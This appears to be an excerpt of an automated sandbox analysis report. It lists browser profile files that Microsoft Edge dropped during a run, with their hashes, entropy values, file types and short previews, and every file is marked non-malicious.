                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                      Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                      MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                      SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                      SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                      SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                      Entropy (8bit):0.04726289645474557
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:JCS0k0pqtmfnOAHpYC0JPi6VBK/7+HfgHX9cIWMEYTwgh81MNH+zRQcD/OXO9qus:ik0ctoP0d4bphHgVfCAqu08T2RGOD
                                                                                                                                                                                                                                                      MD5:967EA3CE4B850CD6184AC8B3544D94A3
                                                                                                                                                                                                                                                      SHA1:A671779FAFBA8DC14142D251CE44E0E9351A5E7C
                                                                                                                                                                                                                                                      SHA-256:8CA0DD33DE54D46404104C092DB10607381F746EF69519CF3789E845CE5F4ACB
                                                                                                                                                                                                                                                      SHA-512:E016A08D9CAF86CCA7E62F3D94534247C3688BD8840E0A6C06FCE339F5CE09EBFDB9B767FF020D3404D7D80115EFEC4D50284C858CB7F3CC3BA8F926862657BE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@...............xj..0Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".awrxwe20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............2..................8...w..U..G...W6.>.........."....."...24.."."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z........W@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2......._
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                      Entropy (8bit):0.4569198389685515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:ivj7o/d48n0WJJSI13YOkcG63wiesC4IYso/5GrdV+qDTFrr2zg1HFM:K7olsI13rkcGSlAoAdV+qDTFrr2zaHq
                                                                                                                                                                                                                                                      MD5:5D8F11FDE7FCB9CCB33F34815E48BF85
                                                                                                                                                                                                                                                      SHA1:069F1B8A27F70F2E42EEF20DBFAF613281E7846A
                                                                                                                                                                                                                                                      SHA-256:AD1F203A19B593C2D2CB47C4810FF6BD3C0CFD89BE907EA7CE95C5316671C6CA
                                                                                                                                                                                                                                                      SHA-512:68B7B1429EA437961D7831A61FE3582E232F5C3AC1442CF6332CFDAE8FF369087F66FAD7CDED3AB19F103B1621A2582CC08452D564313B91012FA863D8338D57
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@...................8...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".awrxwe20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............2..................8...w..U?:K...G...W6.>.........."....."...24.."."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z........W@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .`2.....
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                                                                      Entropy (8bit):4.186405996455797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:FiWWltlUkzpbazHSAS219jlV/TUqjNlWBVP/Sh/Jzv6cRBAVIGGgphVE7GC/Ollt:o1U6BaYIlWBVsJD6dpPhVeGC/O/
                                                                                                                                                                                                                                                      MD5:0D0C6A5A14BC2141201C32A1F7C87A09
                                                                                                                                                                                                                                                      SHA1:CA25216B59523CCC5DFAFB86D4B4D265A6B1BA53
                                                                                                                                                                                                                                                      SHA-256:78ECB5979E18356057D4F459FD12670B202B19E936991A6CCB9931429F732056
                                                                                                                                                                                                                                                      SHA-512:A75F19DDAF31A241EA098482ECE561FC94A33322365289161BDEE95BC4B6429989B32E15CBE6C150A2254AA1388BAF85746CFA7469137F4FBD03F76F7FAF77FB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:sdPC....................i...|.@..s..."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8963f191-f8e0-42ec-8449-d20a8242b3e6............
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40504
                                                                                                                                                                                                                                                      Entropy (8bit):5.561474760474446
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:xkC96I7pLGLPiEWP11fZj8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFAOdYY9Orw0LbI:xkC960cPiEWP11fZju1ja8AO+Y9L0LbI
                                                                                                                                                                                                                                                      MD5:5D44D81BCAD91A0DB6BA99582A5E6F7A
                                                                                                                                                                                                                                                      SHA1:4C5DE8AF21D88C368713CDE6343B2FA2A2F1B1C5
                                                                                                                                                                                                                                                      SHA-256:5B723FCEE6BE966ABBC2653C4EDBE9DF6C254EEE067FE112DFE766AEE67C702C
                                                                                                                                                                                                                                                      SHA-512:9563B87AECAEE01BFB8CEBB5EEEF15A411BD323F76E77D3CF2CBA1F791ABB5573AC0E139DF9D2AC9389450B0B6D0DD8AD5206A99C2EDDBD96425336B51DC5665
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377476313526291","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377476313526291","location":5,"ma
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17395), with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17399
                                                                                                                                                                                                                                                      Entropy (8bit):5.493615293260842
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:stAPGQSu4ksxTi4Xwh0zrBecbGaQwV8j9u:sWOXu2T5c2bGJz9u
                                                                                                                                                                                                                                                      MD5:55F162573ADAE6EF122DFF1A7E368BF7
                                                                                                                                                                                                                                                      SHA1:BFBC7F9A7FBF3427BD8C0D0B58EE432B47783E6A
                                                                                                                                                                                                                                                      SHA-256:EAA9AABAFBF5277FC8356985BBA7CBD4FF1CB0D7A4080A02D2A40B11519362E9
                                                                                                                                                                                                                                                      SHA-512:E51A5F0F595DCF63C19C8CDEDA87D51871340C43E87C9BCDFD7B9BA886A3E876D17A1AD8A832DCFC99E100CB884DBFF627705A5D3C2AE50FD698ABADDAE5A317
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):305
                                                                                                                                                                                                                                                      Entropy (8bit):5.301957589698819
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1C1Fi23oH+Tcwtp3hBtB2KLlVWi1a0FN+q2PFi23oH+Tcwtp3hBWsIFUv:2i1cZYebp3dFLOi1a03+vdZYebp3eFUv
                                                                                                                                                                                                                                                      MD5:1EAE31F9F575E6630A4294232944F391
                                                                                                                                                                                                                                                      SHA1:DA9AE7F8CF06788D3F4468F2EF26473694E7086A
                                                                                                                                                                                                                                                      SHA-256:3EB25C979EB3E1DB98750AD4F7621C21DBBB485E056917634963B6A7467E7DFB
                                                                                                                                                                                                                                                      SHA-512:ADCFB76C1E51D34966935206DEB752845634D5FE66A257355A78F97CBC07271781615A54A27C45E0BC285D884246C86941E2D822DBE5F7A40FD378DE116CC95B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:39.639 202c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/30-16:38:39.652 202c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):2163821
                                                                                                                                                                                                                                                      Entropy (8bit):5.22288256499836
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:tZPeZpVlfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:tZWZpVlfx2mjF
                                                                                                                                                                                                                                                      MD5:942513AE5F926F92C42E72B2EC089240
                                                                                                                                                                                                                                                      SHA1:AA45C41949BA326597F1BC9FC4D91D09370ED030
                                                                                                                                                                                                                                                      SHA-256:3B9F699DC8D3995E7355F4C5A75A5E253B59427A888EE0E1BF39FC5C9B796D22
                                                                                                                                                                                                                                                      SHA-512:4DFEA657EA72F54671F686B71E6F10CE06326F94AB4F3DEA84A1626B7EB9472AF31BFC0B13DE2BC166B246B35FDF1161F11BAE6CC4043D5E188543FA8E74F9AC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340972966846363.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):332
                                                                                                                                                                                                                                                      Entropy (8bit):5.180435847329433
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1mLjL+q2PFi23oH+Tcwt9Eh1tIFUt8YWi17Pd11Zmw+YWi1mlLVkwOFi23oH/:2i1mHyvdZYeb9Eh16FUt87i1BX/+7i1U
                                                                                                                                                                                                                                                      MD5:E3163357C906045F4913B5A960B236D9
                                                                                                                                                                                                                                                      SHA1:0C2CBE9A94B9C7DE0A1C48438237EDD83C361DD6
                                                                                                                                                                                                                                                      SHA-256:7A76FBC270ED7C7977C527C49993179F26DD42ADF4D9F06FC035BED25867C76C
                                                                                                                                                                                                                                                      SHA-512:1076B2E23F00E7057D550BCC223918D60CB1076937CDAD0F983E15E1F4B78BCAA78BD272656D57A9A51E6717821B94B5E3D0129F65960F12BD49D7506A52FA86
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:39.528 2138 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/30-16:38:39.530 2138 Recovering log #3.2024/11/30-16:38:39.539 2138 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
